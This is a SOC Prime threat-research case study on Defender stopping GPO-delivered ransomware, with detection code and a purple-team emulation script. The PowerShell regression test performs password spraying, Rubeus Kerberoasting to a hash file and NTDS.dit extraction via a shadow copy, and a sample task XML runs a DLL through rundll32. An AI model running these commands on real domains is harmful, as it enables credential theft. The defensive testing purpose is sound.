SOC Prime Bias: High

27 Mar 2026 16:45

Case Study: How Defender’s Predictive Shielding Blocked GPO-Based Ransomware Before Execution

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Microsoft Defender interrupted a human-operated ransomware attack aimed at a large educational organization by detecting abuse of Group Policy Objects (GPOs) used to weaken security settings and distribute ransomware through scheduled tasks.

Investigation

The attackers compromised a domain admin account, carried out Active Directory enumeration, brute-forced credentials, collected Kerberos tickets and NTDS data, created rogue local accounts, and deployed malicious GPOs to enforce a tampering policy and trigger ransomware delivery through scheduled tasks.

Mitigation

Defender’s predictive shielding identified the malicious GPO activity, enforced temporary GPO hardening, blocked the scheduled-task ransomware rollout, and prevented encryption across 97% of devices.

Response

Once detected, defenders should immediately enable GPO hardening, contain compromised accounts, block suspicious SMB traffic, and investigate for additional persistence methods, including unauthorized local account creation.
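One way to carry out the last step of that response, examining the suspect GPO's SYSVOL payload offline, as an added example (not part of the original case study and not SOC Prime or Microsoft tooling): a parser for registry.pol, the PReg binary that carries Administrative Template settings such as "Turn off Microsoft Defender Antivirus", and a check of the Preferences ScheduledTasks.xml for tasks that run cmd.exe or rundll32.exe or pull files from a UNC path. The build_registry_pol helper exists only to construct the sample; the sample policy, the task XML and the GPO layout they imply are constructed for this example.

```python
"""Offline triage of a suspect GPO's SYSVOL payload: registry.pol (Administrative
Template settings, PReg v1 binary) and Preferences/ScheduledTasks/ScheduledTasks.xml.
Added example for this page; the samples below are constructed, not case evidence."""
import struct
import xml.etree.ElementTree as ET

REG_DWORD = 4
# (key, value) pairs a Defender-tampering policy sets under HKLM; compared case-insensitively
TAMPER_VALUES = {
    (r"software\policies\microsoft\windows defender", "disableantispyware"),
    (r"software\policies\microsoft\windows defender\real-time protection", "disablerealtimemonitoring"),
    (r"software\policies\microsoft\windows defender\real-time protection", "disablebehaviormonitoring"),
}
SUSPICIOUS_CMDS = {"cmd.exe", "rundll32.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _utf16z(buf, pos):
    """Read a NUL-terminated UTF-16LE string; pos must be 2-byte aligned."""
    end = pos
    while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    if end + 1 >= len(buf):
        raise ValueError("unterminated string")
    return buf[pos:end].decode("utf-16-le"), end + 2


def _expect(buf, pos, ch):
    if buf[pos:pos + 2] != ch.encode("utf-16-le"):
        raise ValueError(f"expected {ch!r} at offset {pos}")
    return pos + 2


def parse_registry_pol(buf):
    """Return [(key, value_name, reg_type, data_bytes)] from a registry.pol body.
    Format: 'PReg' + version 1, then entries '[key;value;type;size;data]' in UTF-16LE
    with type and size as 4-byte little-endian integers."""
    if buf[:4] != b"PReg" or struct.unpack_from("<I", buf, 4)[0] != 1:
        raise ValueError("not a PReg v1 registry.pol")
    pos, entries = 8, []
    while pos < len(buf):
        pos = _expect(buf, pos, "[")
        key, pos = _utf16z(buf, pos)
        pos = _expect(buf, pos, ";")
        value, pos = _utf16z(buf, pos)
        pos = _expect(buf, pos, ";")
        reg_type = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        size = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        data, pos = buf[pos:pos + size], pos + size
        pos = _expect(buf, pos, "]")
        entries.append((key, value, reg_type, data))
    return entries


def build_registry_pol(dword_entries):
    """Serialize (key, value_name, dword) tuples to registry.pol bytes; used only to
    construct the sample below (a real policy is read from SYSVOL)."""
    u = lambda s: s.encode("utf-16-le")
    out = bytearray(b"PReg" + struct.pack("<I", 1))
    for key, value, dword in dword_entries:
        data = struct.pack("<I", dword)
        out += (u("[") + u(key) + b"\x00\x00" + u(";") + u(value) + b"\x00\x00" + u(";")
                + struct.pack("<I", REG_DWORD) + u(";") + struct.pack("<I", len(data)) + u(";")
                + data + u("]"))
    return bytes(out)


def find_defender_tampering(pol_bytes):
    """Policy values that switch Defender components off (DWORD set to 1)."""
    hits = []
    for key, value, reg_type, data in parse_registry_pol(pol_bytes):
        if ((key.lower(), value.lower()) in TAMPER_VALUES and reg_type == REG_DWORD
                and struct.unpack("<I", data)[0] == 1):
            hits.append(f"{key}\\{value}=1")
    return hits


def find_gpp_tasks(tasks_xml):
    """GPP tasks whose action runs a shell/proxy binary or touches a UNC path."""
    findings = []
    for task in ET.fromstring(tasks_xml):        # <ImmediateTaskV2> / <TaskV2> children
        for exe in task.iter("Exec"):
            cmd = (exe.findtext("Command") or "").strip()
            line = f"{cmd} {exe.findtext('Arguments') or ''}".strip()
            if cmd.lower().rsplit("\\", 1)[-1] in SUSPICIOUS_CMDS or "\\\\" in line:
                findings.append({"task": task.get("name"), "kind": task.tag,
                                 "runAs": task.find("Properties").get("runAs"), "command": line})
    return findings


def triage_gpo(pol_bytes, tasks_xml):
    return {"defender_tampering": find_defender_tampering(pol_bytes),
            "suspicious_tasks": find_gpp_tasks(tasks_xml)}


# Constructed samples (assumed layout of a malicious GPO; not evidence from the case)
SAMPLE_POL = build_registry_pol([
    (r"Software\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", 1),
    (r"Software\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableRealtimeMonitoring", 1),
    (r"Software\Policies\Microsoft\Windows\WindowsUpdate\AU", "NoAutoUpdate", 0),   # unrelated
])
SAMPLE_TASKS_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="Update" changed="2026-03-20 09:10:00">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>cmd.exe</Command>
        <Arguments>/c copy \\dc01\netlogon\up.bat C:\Windows\Temp\up.bat &amp;&amp; rundll32.exe C:\Windows\Temp\p.dll,Start</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="Inventory" changed="2025-01-05 08:00:00">
    <Properties action="C" name="Inventory" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>C:\Program Files\Inventory\agent.exe</Command><Arguments>/scan</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

if __name__ == "__main__":
    print(triage_gpo(SAMPLE_POL, SAMPLE_TASKS_XML))
```

Point it at a copy of `\\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\registry.pol` and the matching `Preferences\ScheduledTasks\ScheduledTasks.xml` taken during containment; the `changed` attribute on each task and the GPO's version number in gpt.ini tell you when the attacker pushed it.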

Attack Flow

graph TB
    %% Class Definitions
    classDef action fill:#99ccff
    classDef technique fill:#ffcc99
    classDef builtin fill:#cccccc

    %% Reconnaissance Nodes
    recon_action["<b>Action</b> – Reconnaissance<br/>Used AD Explorer to enumerate Active Directory and performed password guessing."]
    class recon_action action
    recon_brute["<b>Technique</b> – T1110 Brute Force: Password Guessing<br/><b>Description</b> Attempts to guess passwords using trial and error."]
    class recon_brute technique
    recon_account["<b>Technique</b> – T1087.002 Account Discovery: Domain Account<br/><b>Description</b> Enumerates domain user accounts."]
    class recon_account technique
    recon_gpo["<b>Technique</b> – T1615 Group Policy Discovery<br/><b>Description</b> Retrieves Group Policy settings from domain controllers."]
    class recon_gpo technique

    %% Reconnaissance Connections
    recon_action -->|uses| recon_brute
    recon_action -->|discovers| recon_account
    recon_action -->|discovers| recon_gpo

    %% Credential Access Nodes
    action_cred["<b>Action</b> – Credential Access<br/>Performed Kerberoasting and dumped NTDS.dit."]
    class action_cred action
    tech_kerb["<b>Technique</b> – T1558.003 Kerberoasting<br/><b>Description</b> Requests service tickets and cracks them offline."]
    class tech_kerb technique
    tech_ntds["<b>Technique</b> – T1003.003 OS Credential Dumping: NTDS<br/><b>Description</b> Extracts password hashes from the Active Directory database."]
    class tech_ntds technique

    %% Credential Access Connections
    action_cred -->|uses| tech_kerb
    action_cred -->|uses| tech_ntds

    %% Persistence Nodes
    action_persist["<b>Action</b> – Persistence<br/>Created new local accounts on compromised hosts."]
    class action_persist action
    tech_create_local["<b>Technique</b> – T1136.001 Create Account: Local Account<br/><b>Description</b> Adds local user accounts for ongoing access."]
    class tech_create_local technique

    %% Persistence Connections
    action_persist -->|uses| tech_create_local

    %% Lateral Movement Nodes
    action_lateral["<b>Action</b> – Lateral Movement<br/>Used stolen domain credentials to access remote admin shares via SMB."]
    class action_lateral action
    tech_smb["<b>Technique</b> – T1021.002 Remote Services SMB/Windows Admin Shares<br/><b>Description</b> Leverages SMB shares for lateral movement."]
    class tech_smb technique

    %% Lateral Movement Connections
    action_lateral -->|uses| tech_smb

    %% Defense Evasion Nodes
    action_evasion["<b>Action</b> – Defense Evasion<br/>Deployed malicious GPO to disable Microsoft Defender."]
    class action_evasion action
    tech_gpo_mod["<b>Technique</b> – T1484 Domain or Tenant Policy Modification<br/><b>Description</b> Alters Group Policy Objects to change security settings."]
    class tech_gpo_mod technique
    tech_impair["<b>Technique</b> – T1562.001 Impair Defenses Disable or Modify Tools<br/><b>Description</b> Turns off or modifies security tooling."]
    class tech_impair technique

    %% Defense Evasion Connections
    action_evasion -->|modifies| tech_gpo_mod
    action_evasion -->|disables| tech_impair

    %% Impact Preparation Nodes
    action_impact["<b>Action</b> – Impact Preparation<br/>Created scheduled task via GPO to copy and execute files on all domain machines."]
    class action_impact action
    tech_scheduled["<b>Technique</b> – T1053 Scheduled Task/Job<br/><b>Description</b> Schedules execution of commands at defined times."]
    class tech_scheduled technique
    tech_cmd["<b>Technique</b> – T1059.003 Command and Scripting Interpreter Windows Command Shell<br/><b>Description</b> Executes batch files using cmd.exe."]
    class tech_cmd technique
    tech_rundll["<b>Technique</b> – T1218.011 System Binary Proxy Execution Rundll32<br/><b>Description</b> Loads malicious DLLs via rundll32.exe."]
    class tech_rundll technique

    %% Impact Preparation Connections
    action_impact -->|creates| tech_scheduled
    action_impact -->|executes| tech_cmd
    action_impact -->|uses| tech_rundll

    %% Ransomware Deployment Nodes
    action_ransom["<b>Action</b> – Ransomware Deployment<br/>Payload attempts to encrypt files; Defender blocked GPO propagation on many devices."]
    class action_ransom action
    tech_encrypt["<b>Technique</b> – T1486 Data Encrypted for Impact<br/><b>Description</b> Encrypts victim data to demand ransom."]
    class tech_encrypt technique

    %% Ransomware Deployment Connections
    action_ransom -->|uses| tech_encrypt

    %% Overall Flow Sequence
    recon_action -->|leads_to| action_cred
    action_cred -->|leads_to| action_persist
    action_persist -->|leads_to| action_lateral
    action_lateral -->|leads_to| action_evasion
    action_evasion -->|leads_to| action_impact
    action_impact -->|leads_to| action_ransom

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

Attack Narrative & Commands

  1. Active Directory Enumeration with ADExplorer – The attacker runs the Sysinternals utility ADExplorer.exe to browse the AD database, generating a process‑creation event (Sysmon Event 1 or Security Event 4688) that matches Image|endswith: 'ADExplorer.exe'.

  2. Credential Brute‑Force (T1110) – The attacker performs a password‑spray against a domain account, causing repeated failed logons (Event 4625) with failure reason %%2313 (“Unknown user name or bad password”, Status 0xC000006D; SubStatus 0xC000006A means the account exists and the password was wrong).

  3. Kerberoasting (T1558.003) – Using the open‑source tool Rubeus, the attacker requests Kerberos service tickets; each request yields Event 4769 on the domain controller. The rule exercised here keys on requests for computer‑account SPNs (ServiceName ending with $, e.g. HOST01$). Caveat: computer accounts carry long, random, automatically rotated passwords, so those tickets are not practically crackable, and every ordinary host‑to‑host ticket request also ends in $. The conventional Kerberoasting signal is an RC4 ticket (TicketEncryptionType 0x17) for a user‑account SPN, so confirm which of the two the rule under test expects before judging the result.

  4. NTDS Dump (T1003.003) – The attacker creates a Volume Shadow Copy of the system drive with vssadmin (ntdsutil’s IFM export is the equivalent) and copies NTDS.dit out of the snapshot. This variant produces process‑creation telemetry for vssadmin.exe / ntdsutil.exe and a file read of \Windows\NTDS\ntds.dit; it does not produce Event 4662. The 4662 signal (ObjectServer DS, Properties containing the DS‑Replication‑Get‑Changes control‑access rights) belongs to the DCSync variant, which replicates the secrets over RPC instead of reading the file.

All four actions are executed on the same host, a domain controller (step 4 needs NTDS.dit), within a 5‑minute window to emulate a realistic post‑compromise “harvest” phase.
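The four steps above turned into correlation logic and run over constructed event records, as an added example that is neither SOC Prime's rule nor Defender's: each event is classified into a harvest stage, and a host is alerted on when enough distinct stages meet their thresholds inside a 5‑minute window. Field names follow Sysmon and Windows Security events; the Properties GUIDs are the documented DS‑Replication‑Get‑Changes rights. Two assumptions are mine: the correlation keys on the logging Computer, which holds for this simulation because every step runs on the domain controller (a production rule would key on WorkstationName / IpAddress instead), and the Kerberoast stage uses the conventional filter (RC4 ticket for a non‑computer SPN) rather than the $ suffix, while the NTDS stage accepts both the vssadmin/ntdsutil process‑creation signal and the DCSync 4662 signal.

```python
"""Correlate the four 'harvest' signals from the simulation on one host inside a
5-minute window. Added example for this page, not SOC Prime's rule; the events are
constructed dicts carrying the fields of Sysmon 1/4688, 4625, 4769 and 4662 records."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
# minimum hits per stage before it counts: one 4625 is a typo, three in a row is spraying
THRESHOLDS = {"ad_enum": 1, "bad_password": 3, "kerberoast": 1, "ntds_dump": 1}
# control-access rights that appear in 4662 Properties when directory secrets are replicated (DCSync)
DS_REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}


def classify(ev):
    """Map one event to a harvest stage, or None if it is not interesting."""
    eid = ev["EventID"]
    if eid in (1, 4688):                       # Sysmon / Security process creation
        image = ev.get("Image", "").lower()
        cmdline = ev.get("CommandLine", "").lower()
        if image.endswith("\\adexplorer.exe"):
            return "ad_enum"
        if (image.endswith("\\vssadmin.exe") and "create shadow" in cmdline) or \
           (image.endswith("\\ntdsutil.exe") and "ifm" in cmdline):
            return "ntds_dump"                 # shadow copy / IFM export of NTDS.dit
    elif eid == 4625 and ev.get("Status", "").lower() == "0xc000006d":
        return "bad_password"                  # %%2313: unknown user name or bad password
    elif eid == 4769:
        svc = ev.get("ServiceName", "")
        # conventional Kerberoast filter: RC4 ticket for a non-computer, non-krbtgt SPN
        if ev.get("TicketEncryptionType") == "0x17" and not svc.endswith("$") and svc.lower() != "krbtgt":
            return "kerberoast"
    elif eid == 4662 and DS_REPL_GUIDS & {p.lower().strip("{}") for p in ev.get("Properties", [])}:
        return "ntds_dump"                     # replication of directory secrets
    return None


def correlate(events, window=WINDOW, min_stages=4):
    """One alert per host on which >= min_stages stages meet their threshold within `window`."""
    by_host = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            by_host[ev["Computer"]].append((datetime.fromisoformat(ev["Time"]), stage))
    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):    # slide the window start over each hit
            counts = Counter(s for t, s in hits[i:] if t - t0 <= window)
            stages = sorted(s for s, n in counts.items() if n >= THRESHOLDS[s])
            if len(stages) >= min_stages:
                alerts.append({"host": host, "start": t0.isoformat(), "stages": stages})
                break                          # the first matching window is enough for triage
    return alerts


# Constructed sample telemetry (not from the case); everything on DC01 within about four minutes
SAMPLE_EVENTS = [
    {"Time": "2026-03-20T09:00:05", "Computer": "DC01", "EventID": 1,
     "Image": r"C:\Tools\ADExplorer.exe", "CommandLine": "ADExplorer.exe"},
    *[{"Time": f"2026-03-20T09:01:{s:02d}", "Computer": "DC01", "EventID": 4625,
       "TargetUserName": "svc_backup", "Status": "0xc000006d", "SubStatus": "0xc000006a"}
      for s in (10, 11, 12, 13)],
    {"Time": "2026-03-20T09:02:30", "Computer": "DC01", "EventID": 4769,
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"Time": "2026-03-20T09:02:31", "Computer": "DC01", "EventID": 4769,       # normal AES ticket
     "ServiceName": "HOST01$", "TicketEncryptionType": "0x12"},
    {"Time": "2026-03-20T09:04:00", "Computer": "DC01", "EventID": 4688,
     "Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin create shadow /for=C:"},
    {"Time": "2026-03-20T09:04:20", "Computer": "DC01", "EventID": 4662,
     "SubjectUserName": "svc_backup", "Properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"Time": "2026-03-20T09:03:00", "Computer": "WS07", "EventID": 4625,       # one typo, not a spray
     "Status": "0xc000006d", "SubStatus": "0xc000006a"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Running the regression script below and replaying the resulting events through `correlate` is a quick way to see which of the four paths your ingestion actually delivers: a missing stage in the alert's `stages` list points at the collector (Sysmon process creation, DC Security log forwarding) rather than at the rule.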

Regression Test Script

# -------------------------------------------------
# Simulation Script – Triggers all four detection paths
# Run elevated on a domain controller (step 4 needs NTDS.dit)
# -------------------------------------------------

New-Item -ItemType Directory -Path "C:\Temp" -Force | Out-Null

# 1. ADExplorer execution (process creation)
$adExplorerPath = Join-Path $env:ProgramFiles "Sysinternals\ADExplorer.exe"
if (-Not (Test-Path $adExplorerPath)) {
    Write-Host "ADExplorer not found – using a renamed copy of notepad.exe as a stand-in."
    # Only the image name matters for an Image|endswith match
    New-Item -ItemType Directory -Path (Split-Path $adExplorerPath) -Force | Out-Null
    Copy-Item "$env:SystemRoot\System32\notepad.exe" $adExplorerPath
}
$proc = Start-Process -FilePath $adExplorerPath -ArgumentList "/quiet" -WindowStyle Hidden -PassThru
Start-Sleep -Seconds 5
Stop-Process -Id $proc.Id -ErrorAction SilentlyContinue

# 2. Brute‑force login attempts (4625, Status 0xC000006D / failure reason %%2313)
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$domain = "CONTOSO"
$user   = "testuser"
$badPwd = "IncorrectPassword123!"
$ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('Domain', $domain)
1..3 | ForEach-Object {
    $null = $ctx.ValidateCredentials($user, $badPwd)
    Start-Sleep -Milliseconds 500
}

# 3. Kerberoasting via Rubeus (4769 on the DC)
$rubeusPath = Join-Path $env:ProgramFiles "Rubeus\Rubeus.exe"
if (-Not (Test-Path $rubeusPath)) {
    Write-Host "Rubeus not found – skipping Kerberoasting step."
} else {
    # /outfile receives the crackable hashes (hashcat format), not .kirbi tickets
    & $rubeusPath kerberoast /outfile:"C:\Temp\kerb_tickets.kirbi"
}
Start-Sleep -Seconds 5

# 4. NTDS.dit extraction from a fresh VSS snapshot (process creation + file read; no 4662)
$vssOut       = vssadmin create shadow /for=C:
$shadowId     = ($vssOut | Select-String 'Shadow Copy ID: (\{[0-9a-fA-F-]+\})').Matches[0].Groups[1].Value
$shadowVolume = ($vssOut | Select-String 'Shadow Copy Volume Name: (\S+)').Matches[0].Groups[1].Value
Set-Content -Path "C:\Temp\shadow_id.txt" -Value $shadowId    # recorded so cleanup deletes only this snapshot
# \\?\GLOBALROOT device paths are not reliably handled by the PowerShell file provider,
# so copy with cmd.exe, as attacker tooling does
cmd.exe /c copy "$shadowVolume\Windows\NTDS\ntds.dit" "C:\Temp\NTDS_dump.dit"
Start-Sleep -Seconds 5

Write-Host "Simulation complete. All telemetry should be ingested."

Cleanup Commands

# -------------------------------------------------
# Cleanup – removes artifacts created by the simulation
# -------------------------------------------------

# Stop and remove the fake ADExplorer if it was created from notepad.exe
Get-Process -Name ADExplorer -ErrorAction SilentlyContinue | Stop-Process -Force
Remove-Item -Path (Join-Path $env:ProgramFiles "Sysinternals\ADExplorer.exe") -ErrorAction SilentlyContinue

# Delete Kerberoast output
Remove-Item -Path "C:\Temp\kerb_tickets.kirbi" -ErrorAction SilentlyContinue

# Delete NTDS dump (a copy of the domain's credential database – do not leave it behind)
Remove-Item -Path "C:\Temp\NTDS_dump.dit" -ErrorAction SilentlyContinue

# Delete only the shadow copy the simulation created (requires admin)
$shadowId = Get-Content -Path "C:\Temp\shadow_id.txt" -ErrorAction SilentlyContinue
if ($shadowId) {
    vssadmin delete shadows /shadow=$shadowId /quiet
    Remove-Item -Path "C:\Temp\shadow_id.txt" -ErrorAction SilentlyContinue
}
# Last resort; this removes every snapshot (and restore point) on the host:
# vssadmin delete shadows /all /quiet

Write-Host "Cleanup finished."